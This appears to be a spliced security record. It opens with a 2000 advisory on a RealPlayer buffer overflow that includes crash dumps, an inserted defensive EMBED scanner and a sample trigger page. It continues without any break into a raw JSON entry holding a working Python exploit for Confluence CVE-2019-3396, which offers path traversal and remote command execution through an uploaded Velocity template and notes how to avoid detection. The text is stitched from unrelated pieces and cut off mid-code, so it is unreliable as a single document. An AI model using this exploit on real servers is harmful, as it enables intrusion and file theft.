ID SECURITYVULNS:DOC:9 Type securityvulns Reporter Securityvulns Modified 2000-04-04T00:00:00
Description
Win32 RealPlayer 6/7 Buffer Overflow

Vulnerability Summary:
----------------------
There is a buffer overflow in the Win32 RealPlayer Basic client,
versions 6 and 7. This appears to occur when >299 characters
are entered as a 'location' to play, such as http://aaaaa.....
with 300 a's. I have tested the MacOS and Linux RealPlayer
clients and have as yet not found such a vulnerability.

Using the HTML "EMBED" tag to embed RealPlayer in a webpage
and setting the "AUTOSTART=true" flag, you can force RealPlayer
to start automatically, triggering the overflow condition.
While I have not taken the time to find the proper entrance
point in PNEN3260.DLL (which is what crashes, for example,
in RealPlayer 6 Basic), it appears that arbitrary code could
be executed simply by *VISITING* a webpage with the
malicious embedded RealPlayer tags.
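
The trigger conditions above (a RealPlayer EMBED whose location is longer than 299 characters, plus AUTOSTART=true so it fires on page load) are easy to check for on the defensive side. The following scanner is an added example, not part of the original advisory; the MIME types and file extensions it uses to recognise RealPlayer content, and the sample page, are assumptions constructed for the example.

```python
"""
Flag <EMBED> tags that would hand RealPlayer an overlong location.

Added example (not from the advisory). It encodes the advisory's own trigger:
a RealPlayer EMBED whose SRC exceeds 299 characters, and AUTOSTART=true so the
player starts, and the overflow fires, as soon as the page loads.
"""
from html.parser import HTMLParser

MAX_SAFE_LOCATION = 299  # advisory: ">299 characters" entered as a location

# Assumed identifiers for RealPlayer content (not listed in the advisory).
REALPLAYER_MIME_TYPES = {"audio/x-pn-realaudio-plugin", "audio/x-pn-realaudio"}
REALPLAYER_EXTENSIONS = (".ram", ".rm", ".ra", ".rpm")


def _looks_like_realplayer(attrs):
    """True if the TYPE attribute or the SRC extension points at RealPlayer."""
    mime = (attrs.get("type") or "").lower()
    path = (attrs.get("src") or "").lower().split("?", 1)[0]
    return mime in REALPLAYER_MIME_TYPES or path.endswith(REALPLAYER_EXTENSIONS)


class EmbedScanner(HTMLParser):
    """Collects one finding per EMBED tag whose SRC exceeds the safe length."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "embed":
            return
        a = {k.lower(): v for k, v in attrs}  # bare attributes arrive as None
        src = a.get("src") or ""
        if len(src) <= MAX_SAFE_LOCATION:
            return
        realplayer = _looks_like_realplayer(a)
        autostart = (a.get("autostart") or "").lower() == "true"
        if realplayer:
            # AUTOSTART=true means no user interaction is needed.
            risk = "overflow on page load" if autostart else "overflow when the user plays it"
        else:
            risk = "overlong SRC for another plugin; review separately"
        self.findings.append({
            "realplayer": realplayer,
            "autostart": autostart,
            "src_length": len(src),
            "risk": risk,
        })


def scan_html(html):
    """Return the findings for one HTML document."""
    scanner = EmbedScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: a benign clip, the advisory's 300-a location with
# AUTOSTART, and an overlong SRC aimed at a different plugin.
SAMPLE_PAGE = "\n".join([
    "<html><body>",
    '<embed src="http://example.invalid/clip.ram" type="audio/x-pn-realaudio-plugin" autostart="true">',
    '<embed src="http://' + "a" * 300 + '" type="audio/x-pn-realaudio-plugin" autostart="true" hidden="true">',
    '<embed src="http://example.invalid/movie.swf?' + "b" * 300 + '" type="application/x-shockwave-flash">',
    "</body></html>",
])

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding)
```
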

(the following example is using RealPlayer v.6 Basic)

In full effect, yo:
-------------------
For example: RealPlayer Win32 Version 6.0.7.380
Type into "Location" http://aaaaaaaaaaa..... (300 a's)

"This program has performed an illegal operation and will be shut down."
REALPLAY caused an invalid page fault in
module PNEN3260.DLL at 015f:6216d7ca.
Registers:
EAX=61616161 CS=015f EIP=6216d7ca EFLGS=00010202
EBX=007c0158 SS=0167 ESP=00c6fe70 EBP=00c6fe88
ECX=007c0350 DS=0167 ESI=007c0350 FS=629f
EDX=00000001 ES=0167 EDI=007c0350 GS=0000
Bytes at CS:EIP:
ff 10 33 d2 f7 77 08 8b 47 04 8b 34 90 85 f6 8d
Stack dump:
007c0100 61616161 007c0350 007c0158 007c04d0 78009494 00c6fe9c
6216d853 007c0100 007c0100 007c0100 00c6feac 6218407b 007c0100
007c0100 00c6fed4

Fun. It looks like RealPlayer can be made to execute arbitrary
code. It gets worse: using the HTML EMBED tag for RealPlayer, you
can force a web browser (MSIE in this case) to crash as well.
This is left as an exercise for the reader....

Once you embed RealPlayer in an html page, when Real crashes,
it takes Internet Explorer with it...

"This program has performed an illegal operation and will be shut down"
IEXPLORE caused an invalid page fault in
module KERNEL32.DLL at 015f:bff7a379.
Registers:
EAX=61616161 CS=015f EIP=bff7a379 EFLGS=00010216
EBX=084e5054 SS=0167 ESP=0058d840 EBP=0058d864
ECX=61616161 DS=0167 ESI=000003b4 FS=5ac7
EDX=084d0000 ES=0167 EDI=01615dac GS=0000
Bytes at CS:EIP:
89 41 08 8b 53 04 8b 43 08 89 50 04 8d 04 33 50
Stack dump:
01615dac 00000000 084d000c 084d0000 084e5054
00000000 00000000 00009afb 000084e6 0058d88c
bff7a541 084d0000 084e5054 000003b4 00000000
00000001

and the extra bonus of:
"This program has performed an illegal operation and will be shut down"
IEXPLORE caused an invalid page fault in
module PNEN3260.DLL at 015f:621874ba.
Registers:
EAX=8004004e CS=015f EIP=621874ba EFLGS=00010202
EBX=000000c8 SS=0167 ESP=067dfecc EBP=067dfed4
ECX=08616860 DS=0167 ESI=086163e0 FS=3937
EDX=61616161 ES=0167 EDI=8004004e GS=0000
Bytes at CS:EIP:
ff 52 08 8b c7 5f 5e 5d c2 10 00 90 90 90 90 90
Stack dump:
08616b90 085e69f0 067dfeec 6218893b 085034ec
00400050 00400000 00400000 067dff04 621838b4
08616b90 04606568 0000023c 086163e0 067dff38
62183a47

Load the malicious page enough times and you get a fun dialog box
that just won't go away... unless you reboot.

"This program has performed an illegal operation and will be shut down"
IEXPLORE caused an invalid page fault in
module KERNEL32.DLL at 015f:bff87eb5.
Registers:
EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010206
EBX=0288fb1c SS=0167 ESP=0284fff0 EBP=0285005c
ECX=00000000 DS=0167 ESI=83b934e0 FS=2c0f
EDX=83b934e8 ES=0167 EDI=00c1e79c GS=0000
Bytes at CS:EIP:
53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
Stack dump:
etc etc etc.

Resolution:
-----------
Vendor notified 3 April 2000, 10:00 AM MST via email.
Vendor patch should be forthcoming...

----------------------------------------------------
- Adam Muntner            \ Save the Whales!       -
- adam@alienzoo.com       \ Collect Valuable       -
- Systems Engineer        \ Prizes!                -
- http://www.alienzoo.com \                        -
----------------------------------------------------

Get free email and alien enlightenment from
http://www.alienzoo.com
{"packetstorm": [{"lastseen": "2021-01-22T15:47:25", "description": "", "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence 6.12.1 Template Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161065", "href": "https://packetstormsecurity.com/files/161065/Atlassian-Confluence-6.12.1-Template-Injection.html", "sourceData": "`# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \n# Date: 21-Jan-2021 \n# Exploit Author: 46o60 \n# Vendor Homepage: https://www.atlassian.com/software/confluence \n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n# Version: 6.12.1 \n# Tested on: Ubuntu 20.04.1 LTS \n# CVE : CVE-2019-3396 \n \n#!/usr/bin/env python3 \n# -*- coding: UTF-8 -*- \n\"\"\" \n \nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian \nConfluence Server server-side template injection. \n \nVulnerability information: \nAuthors: \nDaniil Dmitriev - Discovering vulnerability \nDmitry (rrock) Shchannikov - Metasploit module \nExploit \nExploitDB: \nhttps://www.exploit-db.com/exploits/46731 \nMetasploit \nhttps://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/ \nexploit/multi/http/confluence_widget_connector \n \nWhile Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made \nfrom the target Confluence server towards attacker's server where the Velocity template with the payload is being \nhosted. If this is not possible, for example, because network where the target Confluence server is located filters all \noutbound traffic, alternative approach is needed. 
This exploit, in addition to original exploit implements this \nalternative approach by first uploading the template to the server and then loading it with original vulnerability from \nlocal file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any \nuser can upload a file to the server by attaching the file to his \"personal space\". \n \nThere are two modes of the exploit: \n1. Exploiting path traversal for file disclosure and directory listings. \n2. RCE by uploading a template file with payload to the server. \n \nIn case where network is filtered and loading remote template is not possible and also you do not have a low-privileged \nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode \nof this exploit. Conveniently, application returns file content as well as directory listing depending on to what path \nis pointing to. As in original exploit no authentication is needed for this mode. \n \nLimitations of path traversal exploit: \n- not possible to distinguish between non-existent path and lack of permissions \n- no distinction between files and directories in the output \n \nIf you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A \nregular user probably has enough privileges for this since each user can have their own personal space where they \nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not \nexists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file \nwith payload from local filesystem instead from remote system. 
\n \nPrerequisite of RCE in this exploit: \n- authenticated session is needed \n- knowledge of where attached files are stored on the file system - if it is not default location then use first mode \nto find it, should be in Confluence install directory under ./attachments subdirectory \n \nUsage \n- list /etc folder on Confluence server hosted on http://confluence.example.com \npython exploit.py -th confluence.example.com fs /etc \n- get content of /etc/passwd on same server but through a proxy \npython exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd \n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using \nexisting session) \npython exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\" \n \nTested on Confluence versions: \n6.12.1 \n \nTo test the exploit: \n1. Download Confluence trial version for version 6.12.1 \nhttps://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n(to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser \nnetwork tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and \nchange the version in URL to be 6.12.1) \nSHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin \n2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default. \nchmod +x atlassian-confluence-6.12.1-x64.bin \nsudo ./atlassian-confluence-6.12.1-x64.bin \n3. Open the browser to configure initial installation, when you get to license window copy the server ID. \n4. Create account at https://my.atlassian.com/ and request for new trial license using server ID. \n5. Activate the license and finish the installation with default options. \n6. 
Create a user and login with him to go through initial user setup and get the session id for RCE part of the \nexploit. \n7. Run the exploit (see usage above). \n\"\"\" \n \n__version__ = \"1.0.0\" \n__author__ = \"46o60\" \n \nimport argparse \nimport logging \nimport requests \nimport urllib3 \nfrom bs4 import BeautifulSoup \nimport re \nimport json \nimport random \nimport string \n \n# script and banner \nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\" \nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \n \n\"\"\" \n \n# turn off requests log output \nurllib3.disable_warnings() \nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING) \n \n \ndef print_banner(): \n\"\"\" \nPrints script ASCII banner and basic information. \n \nBecause it is cool. \n\"\"\" \nprint(ASCII_BANNER_TEXT) \nprint(\"{} v{}\".format(SCRIPT_NAME, __version__)) \nprint(\"Author: {}\".format(__author__)) \nprint() \n \n \ndef exit_log(logger, message): \n\"\"\" \nUtility function to log exit message and finish the script. \n\"\"\" \nlogger.error(message) \nexit(1) \n \n \ndef check_cookie_format(value): \n\"\"\" \nChecks if value is in format: ^[^=]+=[^=]+$ \n\"\"\" \npattern = r\"^[^=]+=[^=]+$\" \nif not re.match(pattern, value): \nraise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\") \nreturn value \n \n \ndef parse_arguments(): \n\"\"\" \nPerforms parsing of script arguments. 
\n\"\"\" \n# creating parser \nparser = argparse.ArgumentParser( \nprog=SCRIPT_NAME, \ndescription=\"Exploit CVE-2019-3396 to explore file system or gain RCE through file upload.\" \n) \n \n# general script arguments \nparser.add_argument( \n\"-V\", \"--version\", \nhelp=\"displays the current version of the script\", \naction=\"version\", \nversion=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__) \n) \nparser.add_argument( \n\"-v\", \"--verbosity\", \nhelp=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\", \naction=\"count\", \ndefault=0 \n) \nparser.add_argument( \n\"-sb\", \"--skip-banner\", \nhelp=\"skips printing of the banner\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-s\", \"--silent\", \nhelp=\"do not output results of the exploit to standard output\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-q\", \"--quiet\", \nhelp=\"do not output any logs\", \naction=\"store_true\", \ndefault=False \n) \n \n# arguments for input \nparser.add_argument( \n\"-px\", \"--proxy\", \nhelp=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\" \n) \nparser.add_argument( \n\"-t\", \"--tls\", \nhelp=\"use HTTPS protocol, default behaviour is to use plain HTTP\", \naction=\"store_true\" \n) \nparser.add_argument( \n\"-th\", \"--target-host\", \nhelp=\"target hostname/domain\", \nrequired=True \n) \nparser.add_argument( \n\"-p\", \"--port\", \nhelp=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\" \n) \n \n# two different sub commands \nsubparsers = parser.add_subparsers( \ntitle=\"actions\", \ndescription=\"different behaviours of the script\", \nhelp=\"for detail description of available action options invoke -h for each individual action\", \ndest=\"action\" \n) \n \n# only exploring file system by disclosure of files and directories \nparser_file_system = 
subparsers.add_parser( \n\"fs\", \nhelp=\"use the exploit to browse local file system on the target endpoint\" \n) \nparser_file_system.add_argument( \n\"path\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_file_system.set_defaults(func=exploit_path_traversal) \n \n# using file upload to deploy payload and achieve RCE \nparser_rce = subparsers.add_parser( \n\"rce\", \nhelp=\"use the exploit to upload a template \" \n) \nparser_rce.add_argument( \n\"-hd\", \"--home-directory\", \nhelp=\"Confluence home directory on the server\" \n) \nparser_rce.add_argument( \n\"-c\", \"--cookie\", \nhelp=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \" \n\"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\", \ntype=check_cookie_format, \nrequired=True \n) \nparser_rce.add_argument( \n\"command\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_rce.set_defaults(func=exploit_rce) \n \n# parsing \narguments = parser.parse_args() \n \nreturn arguments \n \n \nclass Configuration: \n\"\"\" \nRepresents all supported configuration items. \n\"\"\" \n \n# Parse arguments and set all configuration variables \ndef __init__(self, script_args): \nself.script_arguments = script_args \n \n# setting input arguments \nself._proxy = self.script_arguments.proxy \nself._target_protocol = \"https\" if self.script_arguments.tls else \"http\" \nself._target_host = self.script_arguments.target_host \nself._target_port = self.script_arguments.port if self.script_arguments.port else \\ \n443 if self.script_arguments.tls else 80 \n \n@staticmethod \ndef get_logger(verbosity): \n\"\"\" \nPrepares logger to output to stdout with appropriate verbosity. 
\n\"\"\" \nlogger = logging.getLogger() \n# default logging level \nlogger.setLevel(logging.DEBUG) \n \n# Definition of logging to console \nch = logging.StreamHandler() \n# specific logging level for console \nif verbosity == 0: \nch.setLevel(logging.INFO) \nelif verbosity > 0: \nch.setLevel(logging.DEBUG) \n \n# formatting \nclass MyFormatter(logging.Formatter): \n \ndefault_fmt = logging.Formatter('[?] %(message)s') \ninfo_fmt = logging.Formatter('[+] %(message)s') \nerror_fmt = logging.Formatter('[-] %(message)s') \nwarning_fmt = logging.Formatter('[!] %(message)s') \ndebug_fmt = logging.Formatter('>>> %(message)s') \n \ndef format(self, record): \nif record.levelno == logging.INFO: \nreturn self.info_fmt.format(record) \nelif record.levelno == logging.ERROR: \nreturn self.error_fmt.format(record) \nelif record.levelno == logging.WARNING: \nreturn self.warning_fmt.format(record) \nelif record.levelno == logging.DEBUG: \nreturn self.debug_fmt.format(record) \nelse: \nreturn self.default_fmt.format(record) \n \nch.setFormatter(MyFormatter()) \n \n# adding handler \nlogger.addHandler(ch) \n \nreturn logger \n \n# Properties \n@property \ndef endpoint(self): \nif not self._target_protocol or not self._target_host or not self._target_port: \nexit_log(log, \"failed to generate endpoint URL\") \nreturn f\"{self._target_protocol}://{self._target_host}:{self._target_port}\" \n \n@property \ndef remote_path(self): \nreturn self.script_arguments.path \n \n@property \ndef attachment_dir(self): \nhome_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\ \nExploit.DEFAULT_CONFLUENCE_INSTALL_DIR \nreturn f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\" \n \n@property \ndef rce_command(self): \nreturn self.script_arguments.command \n \n@property \ndef session_cookie(self): \nif not self.script_arguments.cookie: \nreturn None \nparts = self.script_arguments.cookie.split(\"=\") \nreturn { \nparts[0]: parts[1] \n} \n \n@property 
\ndef proxies(self): \nreturn { \n\"http\": self._proxy, \n\"https\": self._proxy \n} \n \n \nclass Exploit: \n\"\"\" \nThis class represents actual exploit towards the target Confluence server. \n\"\"\" \n# used for both path traversal and RCE \nDEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\" \n \n# used only for RCE \nCREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\" \nPERSONAL_SPACE_KEY_PATH = \"/index.action\" \nPERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\" \nPERSONAL_SPACE_ID_PATH = \"/rest/api/space\" \nPERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\" \nHOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\" \nATL_TOKEN_PATH = \"/pages/viewpageattachments.action\" \nFILE_UPLOAD_PATH = \"/pages/doattachfile.action\" \n# file name has no real significance, file is identified on file system by it's ID \n# (change only if you want to avoid detection) \nDEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format( \n''.join(random.choice(string.ascii_lowercase) for i in range(5)) \n) # the extension .vm is not really needed, remove it if you have problems uploading the template \nDEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\" \nDEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\" \n# using random name for uploaded file so it will always be first version of the file \nDEFAULT_FILE_VERSION = \"1\" \n \ndef __init__(self, config): \n\"\"\" \nRuns the exploit towards target_url. 
\n\"\"\" \nself._config = config \n \nself._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\" \n \nif self._config.script_arguments.action == \"rce\": \nself._root_url = f\"{self._config.endpoint}/\" \nself._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\" \nself._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\" \n \n# Following data will be dynamically created while exploit is running \nself._space_key = None \nself._personal_space_id_url = None \nself._space_id = None \nself._homepage_id = None \nself._atl_token_url = None \nself._atl_token = None \nself._upload_url = None \nself._file_id = None \n \ndef generate_payload_location(self): \n\"\"\" \nGenerates location on file system for uploaded attachment based on Confluence Ver003 scheme. \n \nSee more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html \n\"\"\" \nif not self._space_id or not self._homepage_id or not self._file_id: \nexit_log(log, \"cannot generate payload location without space, homepage and file ID\") \n \nspace_folder_one = str(int(self._space_id[-3:]) % 250) \nspace_folder_two = str(int(self._space_id[-6:-3]) % 250) \nspace_folder_three = self._space_id \npage_folder_one = str(int(self._homepage_id[-3:]) % 250) \npage_folder_two = str(int(self._homepage_id[-6:-3]) % 250) \npage_folder_three = self._homepage_id \nfile_folder = self._file_id \nversion = Exploit.DEFAULT_FILE_VERSION \n \npayload_location = f\"{self._config.attachment_dir}/\" \\ \nf\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\ \nf\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\ \nf\"{file_folder}/{version}\" \nlog.debug(f\"generated payload location: {payload_location}\") \n \nreturn payload_location \n \ndef path_traversal(self, target_remote_path, decode_output=False): \n\"\"\" \nUses vulnerability in _template parameter to achieve 
path traversal. \n \nArgs: \ntarget_remote_path (string): path on local file system of the target application \ndecode_output (bool): set to True if output of the file will be character codes separated by new lines, \nused with RCE \n\"\"\" \npost_data = { \n\"contentId\": str(random.randint(1, 10000)), \n\"macro\": { \n\"body\": \"\", \n\"name\": \"widget\", \n\"params\": { \n\"_template\": f\"file://{target_remote_path}\", \n\"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice( \nstring.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) \n} \n} \n} \n \nlog.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\") \nresponse = requests.post( \nself._target_url, \nheaders={ \n\"Content-Type\": \"application/json; charset=utf-8\" \n}, \njson=post_data, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"exploit failed\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \n# if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve \n# the requested path \nerror_element = soup.find_all(\"div\", \"widget-error\") \nif error_element: \nlog.warning(\"failed to retrieve target path on the system\") \nlog.warning(\"target path does not exist or application does not have appropriate permissions to view it\") \nreturn \"\" \nelse: \n# otherwise parse out the actual response (file content or directory listing) \noutput_element = soup.find_all(\"div\", \"wiki-content\") \n \nif not output_element: \nexit_log(log, \"application did not return appropriate HTML element\") \nif not len(output_element) == 1: \nlog.warning(\"application unexpectedly returned multiple HTML elements, using the first one\") 
\noutput_element = output_element[0] \n \nlog.debug(\"extracting HTML element value and stripping the leading and trailing spaces\") \n# output = output_element.string.strip() \noutput = output_element.decode_contents().strip() \n \nif \"The macro 'widget' is unknown. It may have been removed from the system.\" in output: \nexit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\") \n \nif not self._config.script_arguments.silent: \nif decode_output: \nparsed_output = \"\" \np = re.compile(r\"^([0-9]+)\") \nfor line in output.split(\"\\n\"): \nr = p.match(line) \nif r: \nparsed_output += chr(int(r.group(1))) \nprint(parsed_output.strip()) \nelse: \nprint(output) \n \nreturn output \n \ndef find_personal_space_key(self): \n\"\"\" \nMakes request that will return personal space key in the response. \n\"\"\" \nlog.debug(\"checking if user has personal space\") \nresponse = requests.get( \nself._root_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \n) \npage_content = response.text \nif \"Add personal space\" in page_content: \nlog.info(f\"user does not have personal space, creating it now...\") \n \nresponse = requests.post( \nself._create_personal_space_url, \nheaders={ \n\"Content-Type\": \"application/json\" \n}, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \njson={ \n\"spaceUserKey\": \"\" \n} \n) \n \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to create personal space\") \n \nlog.debug(f\"personal space created\") \nresponse_data = response.json() \nself._space_key = response_data.get(\"key\") \nelse: \nlog.info(\"sending request to find personal space key\") \nresponse = requests.get( \nself._personal_space_key_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... 
\nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \npersonal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\") \nif not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"): \nexit_log(log, \"failed to find personal space link in the response, does the user have personal space?\") \npath = personal_space_link_element[\"href\"] \np = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) \nr = p.match(path) \nif r: \nself._space_key = r.group(1) \nelse: \nexit_log(log, \"failed to find personal space key\") \n \nlog.debug(f\"personal space key: {self._space_key}\") \nself._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\ \nf\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\" \nlog.debug(f\"generated personal space id url: {self._personal_space_id_url}\") \n \ndef find_personal_space_id_and_homepage_id(self): \n\"\"\" \nMakes request that will return personal space ID and homepage ID in the response. \n\"\"\" \nif self._personal_space_id_url is None: \nexit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find personal space ID and homepage\") \nresponse = requests.get( \nself._personal_space_id_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... 
\nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space id and homepage id\") \n \npage_content = response.content \n# response is JSON \ndata = json.loads(page_content) \n \nif \"results\" not in data: \nexit_log(log, \"failed to find 'results' section in json output\") \nitems = data[\"results\"] \nif type(items) is not list or len(items) == 0: \nexit_log(log, \"no results for personal space id\") \npersonal_space_data = items[0] \nif \"id\" not in personal_space_data: \nexit_log(log, \"failed to find ID in personal space data\") \nself._space_id = str(personal_space_data[\"id\"]) \nlog.debug(f\"found space id: {self._space_id}\") \nif \"_expandable\" not in personal_space_data: \nexit_log(log, \"failed to find '_expandable' section in personal space data\") \npersonal_space_expandable_data = personal_space_data[\"_expandable\"] \nif \"homepage\" not in personal_space_expandable_data: \nexit_log(log, \"failed to find homepage in personal space expandable data\") \nhomepage_path = personal_space_expandable_data[\"homepage\"] \np = re.compile(Exploit.HOMEPAGE_REGEX) \nr = p.match(homepage_path) \nif r: \nself._homepage_id = r.group(1) \nlog.debug(f\"found homepage id: {self._homepage_id}\") \nself._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated atl token url: {self._atl_token_url}\") \nself._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated upload url: {self._upload_url}\") \nelse: \nexit_log(log, \"failed to find homepage id, homepage path has incorrect format\") \n \ndef get_csrf_token(self): \n\"\"\" \nMakes request to get the current CSRF token for the session. 
\n\"\"\" \nif self._atl_token_url is None: \nexit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find CSRF token\") \nresponse = requests.get( \nself._atl_token_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \natl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"}) \nif not atl_token_element.has_attr(\"value\"): \nexit_log(log, \"failed to find value for atl_token\") \nself._atl_token = atl_token_element[\"value\"] \nlog.debug(f\"found CSRF token: {self._atl_token}\") \n \ndef upload_template(self): \n\"\"\" \nMakes multipart request to upload the template file to the server. \n\"\"\" \nlog.info(\"uploading template to server\") \nif not self._atl_token: \nexit_log(log, \"cannot upload a file without CSRF token\") \nif self._upload_url is None: \nexit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\") \n \n# Velocity template here executes command and then captures the output. Here the output is generated by printing \n# character codes one by one in each line. This can be improved for sure but did not have time to investigate \n# why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern \n# webapp' was not working properly. This gets decoded on our python client later. 
\ntemplate = f\"\"\"#set( $test = \"test\" ) \n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\")) \n#set($exout = $ex.waitFor()) \n#set($out = $ex.getInputStream()) \n#foreach($i in [1..$out.available()]) \n#set($ch = $out.read()) \n$ch \n#end\"\"\" \n \nlog.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\") \nparts = { \n\"atl_token\": (None, self._atl_token), \n\"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), \n\"confirm\": \"Attach\" \n} \nresponse = requests.post( \nself._upload_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nfiles=parts \n) \n \n# for successful upload first a 302 response needs to happen then 200 page is returned with file ID \nif response.status_code == 403: \nexit_log(log, \"got 403, probably problem with CSRF token\") \nif not len(response.history) == 1 or not response.history[0].status_code == 302: \nexit_log(log, \"failed to upload the payload\") \n \npage_content = response.content \n \nif \"Upload Failed\" in str(page_content): \nexit_log(log, \"failed to upload template\") \n \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \nfile_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME}) \nif not 